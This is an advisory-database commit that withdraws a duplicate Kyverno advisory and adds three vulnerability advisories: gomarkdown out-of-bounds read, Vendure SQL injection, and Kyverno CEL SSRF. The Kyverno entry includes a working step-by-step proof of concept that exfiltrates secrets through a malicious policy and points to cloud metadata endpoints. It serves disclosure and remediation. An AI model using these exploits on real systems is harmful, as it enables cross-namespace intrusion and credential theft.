Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit cd5e6e2ee9ee · 2026-04-14T22:38:57.000Z
GHSA-qqrv-2hch-83q4 GHSA-77fj-vx54-gvh7 GHSA-9pp3-53p2-ww9v GHSA-rggm-jjmc-3394
diff --git a/advisories/github-reviewed/2026/03/GHSA-qqrv-2hch-83q4/GHSA-qqrv-2hch-83q4.json b/advisories/github-reviewed/2026/03/GHSA-qqrv-2hch-83q4/GHSA-qqrv-2hch-83q4.json
@@ -1,13 +1,12 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-qqrv-2hch-83q4",
-  "modified": "2026-04-01T23:07:50Z",
+  "modified": "2026-04-14T22:36:54Z",
   "published": "2026-03-30T21:31:05Z",
-  "aliases": [
-    "CVE-2026-4789"
-  ],
-  "summary": "Kyverno is vulnerable to server-side request forgery (SSRF)",
-  "details": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
+  "withdrawn": "2026-04-14T22:36:54Z",
+  "aliases": [],
+  "summary": "Duplicate Advisory: Kyverno is vulnerable to server-side request forgery (SSRF)",
+  "details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-rggm-jjmc-3394. This link is maintained to preserve external references.\n\n## Original Description\nKyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
   "severity": [
     {
       "type": "CVSS_V4",
diff --git a/advisories/github-reviewed/2026/04/GHSA-77fj-vx54-gvh7/GHSA-77fj-vx54-gvh7.json b/advisories/github-reviewed/2026/04/GHSA-77fj-vx54-gvh7/GHSA-77fj-vx54-gvh7.json
@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-77fj-vx54-gvh7",
+  "modified": "2026-04-14T22:38:20Z",
+  "published": "2026-04-14T22:38:20Z",
+  "aliases": [],
+  "summary": "Go Markdown has an Out-of-bounds Read in SmartypantsRenderer",
+  "details": "### Summary\n\nProcessing a malformed input containing a `<` character that is not followed by a `>` character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.\n\n### Details\n\nThe `smartLeftAngle()` function in `html/smartypants.go:367-376` performs an out-of-bounds slice operation when processing a `<` character that is not followed by a `>` character anywhere in the remaining text.\nhttps://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376\nIf the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.\n\n### PoC\n```golang\npackage main\n\nimport (\n\t\"bytes\"\n\t\"fmt\"\n\n\t\"github.com/gomarkdown/markdown/html\"\n)\n\nfunc main() {\n\tsrc := []byte(\"<a\")\n\n\tfmt.Printf(\"Input: %q  (len=%d, cap=%d)\\n\", src, len(src), cap(src))\n\n\tvar buf bytes.Buffer\n\tsp := html.NewSmartypantsRenderer(html.Smartypants)\n\tsp.Process(&buf, src) // panics: slice bounds out of range\n\n\tfmt.Printf(\"Output: %q\\n\", buf.String())\n}\n```\n\n### Impact\nThis vulnerability will lead to a Denial of Service / panic on the processing service.\n\n\n-- The Datadog Security Team",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/gomarkdown/markdown"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.0.0-20260411013819-759bbc3e3207"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/gomarkdown/markdown/security/advisories/GHSA-77fj-vx54-gvh7"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/gomarkdown/markdown/commit/759bbc3e32073c3bc4e25969c132fc520eda2778"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/gomarkdown/markdown"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-125"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T22:38:20Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-9pp3-53p2-ww9v/GHSA-9pp3-53p2-ww9v.json b/advisories/github-reviewed/2026/04/GHSA-9pp3-53p2-ww9v/GHSA-9pp3-53p2-ww9v.json
@@ -0,0 +1,93 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-9pp3-53p2-ww9v",
+  "modified": "2026-04-14T22:38:01Z",
+  "published": "2026-04-14T22:38:01Z",
+  "aliases": [],
+  "summary": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in @vendure/core",
+  "details": "## Summary\n\nAn unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query string parameter is interpolated directly into a raw SQL expression without parameterization or validation, allowing an attacker to execute arbitrary SQL against the database. This affects all supported database backends (PostgreSQL, MySQL/MariaDB, SQLite).\n\nThe Admin API is also affected, though exploitation there requires authentication.\n\n## Affected versions\n\n- `@vendure/core` < 2.3.4\n- `@vendure/core` >= 3.0.0, < 3.5.7\n- `@vendure/core` >= 3.6.0, < 3.6.2\n\nNote: versions 2.3.4 and above in the 2.x line are patched. There were no 2.4.x or 2.x releases between 2.3.x and 3.0.0.\n\n## Patched versions\n\n- `@vendure/core` 2.3.4\n- `@vendure/core` 3.5.7\n- `@vendure/core` 3.6.2\n\n## Details\n\nIn `ProductService.findOneBySlug`, the request context's `languageCode` value is interpolated into a SQL `CASE` expression via a JavaScript template literal:\n\n```ts\n.addSelect(\n    `CASE translation.languageCode WHEN '${ctx.languageCode}' THEN 2 WHEN '${ctx.channel.defaultLanguageCode}' THEN 1 ELSE 0 END`,\n    'sort_order',\n)\n```\n\nTypeORM has no opportunity to parameterize this value because it is embedded directly into the SQL string before being passed to the query builder.\n\nThe `languageCode` value can originate from the HTTP query string and is set on the request context for every incoming API request. The value is cast to the `LanguageCode` TypeScript type at compile time, but no runtime validation is performed -- the raw query string value is used as-is.\n\n## Attack vector\n\nAn unauthenticated attacker can append a crafted `languageCode` query parameter to any Shop API request to inject arbitrary SQL into the query. No user interaction is required. The vulnerable endpoint is exposed on every default Vendure installation.\n\n## Mitigation\n\n**Upgrade to a patched version immediately.**\n\nIf you cannot upgrade right away, apply the following hotfix to `RequestContextService.getLanguageCode` to validate the `languageCode` input at the boundary. This blocks injection payloads before they can reach any query:\n\n```ts\nprivate getLanguageCode(req: Request, channel: Channel): LanguageCode | undefined {\n    const queryLanguageCode = req.query?.languageCode as string | undefined;\n    const isValidFormat = queryLanguageCode && /^[a-zA-Z0-9_-]+$/.test(queryLanguageCode);\n    return (\n        (isValidFormat ? (queryLanguageCode as LanguageCode) : undefined) ??\n        channel.defaultLanguageCode ??\n        this.configService.defaultLanguageCode\n    );\n}\n```\n\nThis replaces the existing `getLanguageCode` method in `packages/core/src/service/helpers/request-context/request-context.service.ts`. Invalid values are silently dropped and the channel's default language is used instead.\n\nThe patched versions additionally convert the vulnerable SQL interpolation to a parameterized query as defense in depth.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@vendure/core"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "3.0.0"
+            },
+            {
+              "fixed": "3.5.7"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@vendure/core"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "3.6.0"
+            },
+            {
+              "fixed": "3.6.2"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@vendure/core"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "1.7.4"
+            },
+            {
+              "fixed": "2.3.4"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/vendurehq/vendure/security/advisories/GHSA-9pp3-53p2-ww9v"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/vendurehq/vendure"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T22:38:01Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-rggm-jjmc-3394/GHSA-rggm-jjmc-3394.json b/advisories/github-reviewed/2026/04/GHSA-rggm-jjmc-3394/GHSA-rggm-jjmc-3394.json
@@ -0,0 +1,69 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-rggm-jjmc-3394",
+  "modified": "2026-04-14T22:37:20Z",
+  "published": "2026-04-14T22:37:20Z",
+  "aliases": [
+    "CVE-2026-4789"
+  ],
+  "summary": "Kyverno has SSRF via CEL http.Get/http.Post in NamespacedValidatingPolicy allows cross-namespace data access",
+  "details": "## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Kyverno's CEL HTTP library (`pkg/cel/libs/http/`) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.\n\n## Affected Versions\n\n- Kyverno >= 1.16.0 (with `policies.kyverno.io` CRDs enabled, which is the default)\n- Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)\n\n## Details\n\nThe `http.Get()` and `http.Post()` functions available in CEL-based policies (`policies.kyverno.io` API group) do not enforce any URL restrictions. Unlike `resource.Lib` which enforces namespace boundaries for namespaced policies, the `http.Lib` allows unrestricted access to any URL.\n\n**Vulnerable Code:** `pkg/cel/libs/http/http.go`\n```go\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n    req, err := http.NewRequestWithContext(context.TODO(), \"GET\", url, nil)\n    // NO URL VALIDATION - no blocklist, no namespace restrictions\n    ...\n}\n```\n\n**Contrast with resource.Lib** which enforces namespace:\n```go\n// pkg/cel/libs/resource/lib.go\nfunc Lib(namespace string, v *version.Version) cel.EnvOption {\n    return cel.Lib(&lib{namespace: namespace, version: v})  // Namespace enforced\n}\n```\n\nThis is a **different code path** from previously reported issues:\n- GHSA-8p9x-46gm-qfx2: `pkg/engine/apicall/apiCall.go` (URLPath) - Fixed\n- GHSA-459x-q9hg-4gpq: `pkg/engine/apicall/executor.go` (Service.URL) - Different feature (apiCall vs CEL http)\n- **This issue**: `pkg/cel/libs/http/http.go` (CEL http.Get/http.Post) - **Not fixed**\n\n## PoC\n\nTested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).\n\nA complete automated PoC script is attached. Manual steps below:\n\n### 1. Setup attacker with namespace-scoped permissions\n```bash\nkubectl create namespace attacker-ns\nkubectl create serviceaccount namespace-admin -n attacker-ns\n\ncat <<EOF | kubectl apply -f -\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: namespace-admin-role\n  namespace: attacker-ns\nrules:\n  - apiGroups: [\"\"]\n    resources: [\"configmaps\"]\n    verbs: [\"create\", \"get\", \"list\"]\n  - apiGroups: [\"policies.kyverno.io\"]\n    resources: [\"namespacedvalidatingpolicies\"]\n    verbs: [\"create\", \"get\", \"list\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: namespace-admin-binding\n  namespace: attacker-ns\nsubjects:\n  - kind: ServiceAccount\n    name: namespace-admin\n    namespace: attacker-ns\nroleRef:\n  kind: Role\n  name: namespace-admin-role\n  apiGroup: rbac.authorization.k8s.io\nEOF\n```\n\n### 2. Create sensitive internal service (simulating internal API or cloud metadata)\n```bash\ncat <<EOF | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n  name: internal-api\n  namespace: kube-system\n  labels:\n    app: internal-api\nspec:\n  containers:\n  - name: server\n    image: hashicorp/http-echo\n    args:\n      - \"-text={\\\"secret\\\": \\\"STOLEN_INTERNAL_SECRET_12345\\\", \\\"token\\\": \\\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\\\"}\"\n      - \"-listen=:8080\"\n---\napiVersion: v1\nkind: Service\nmetadata:\n  name: internal-api\n  namespace: kube-system\nspec:\n  selector:\n    app: internal-api\n  ports:\n  - port: 80\n    targetPort: 8080\nEOF\n```\n\n### 3. Verify attacker cannot access kube-system directly\n```bash\nkubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin\n# Output: no\n```\n\n### 4. Create malicious NamespacedValidatingPolicy (as attacker)\n```bash\ncat <<EOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -\napiVersion: policies.kyverno.io/v1beta1\nkind: NamespacedValidatingPolicy\nmetadata:\n  name: cel-ssrf-poc\n  namespace: attacker-ns\nspec:\n  matchConstraints:\n    resourceRules:\n      - apiGroups: [\"\"]\n        apiVersions: [\"v1\"]\n        operations: [\"CREATE\"]\n        resources: [\"configmaps\"]\n  variables:\n    - name: stolenData\n      expression: |\n        http.Get('http://internal-api.kube-system.svc.cluster.local')\n  validations:\n    - expression: \"false\"\n      message: \"Validation failed\"\n      messageExpression: |\n        'SSRF_LEAKED: secret=' + variables.stolenData['secret'] + ' token=' + variables.stolenData['token']\nEOF\n```\n\n### 5. Trigger exploit and exfiltrate data\n```bash\nkubectl create configmap trigger --from-literal=x=y -n attacker-ns \\\n  --as=system:serviceaccount:attacker-ns:namespace-admin\n```\n\n### 6. Result - Secret data exfiltrated\n```\nerror: failed to create configmap: admission webhook \"nvpol.validate.kyverno.svc-fail\" \ndenied the request: Policy cel-ssrf-poc failed: \nSSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\n```\n\n## Impact\n\n1. **Cross-namespace data access**: Users with only namespace-scoped permissions can access services in any namespace\n2. **Cloud credential theft**: Access to `http://169.254.169.254/...` allows stealing AWS/GCP/Azure IAM credentials\n3. **Data exfiltration**: HTTP response data exposed via validation error messages or audit annotations\n4. **Breaks namespace isolation**: Inconsistent with Kyverno's security model where `resource.Lib` enforces namespace boundaries\n\n## Affected Policies\n\nAll CEL-based namespaced policies in `policies.kyverno.io` API group:\n- `NamespacedValidatingPolicy`\n- `NamespacedMutatingPolicy` \n- `NamespacedDeletingPolicy`\n- `NamespacedImageValidatingPolicy`\n\n## Suggested Fix\n\nAdd namespace and URL restrictions to `pkg/cel/libs/http/http.go`, similar to how `resource.Lib` enforces namespace boundaries:\n```go\ntype lib struct {\n    namespace string  // Add namespace parameter\n    version   *version.Version\n}\n\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n    if err := r.validateURL(url); err != nil {\n        return nil, fmt.Errorf(\"blocked URL: %w\", err)\n    }\n    // ... existing code\n}\n\nfunc (r *contextImpl) validateURL(urlStr string) error {\n    // Block cloud metadata (169.254.0.0/16)\n    // Block localhost/loopback (127.0.0.0/8)\n    // For namespaced policies: restrict to same namespace services only\n}\n```\n\nAttached \n[kyverno-cel-ssrf-poc.sh](https://github.com/user-attachments/files/24940825/kyverno-cel-ssrf-poc.sh)\n\n\n## Credit\n\nDiscovered by: Igor Stepansky\nOrganization: Orca Security\nEmail: igor.stepansky@orca.security\nPersonal Email: stepanskyigor@gmail.com",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/kyverno/kyverno"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "1.16.0"
+            },
+            {
+              "fixed": "1.17.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-rggm-jjmc-3394"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/kyverno/kyverno/pull/15729"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/kyverno/kyverno"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.kb.cert.org/vuls/id/655822"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-918"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T22:37:20Z",
+    "nvd_published_at": null
+  }
+}
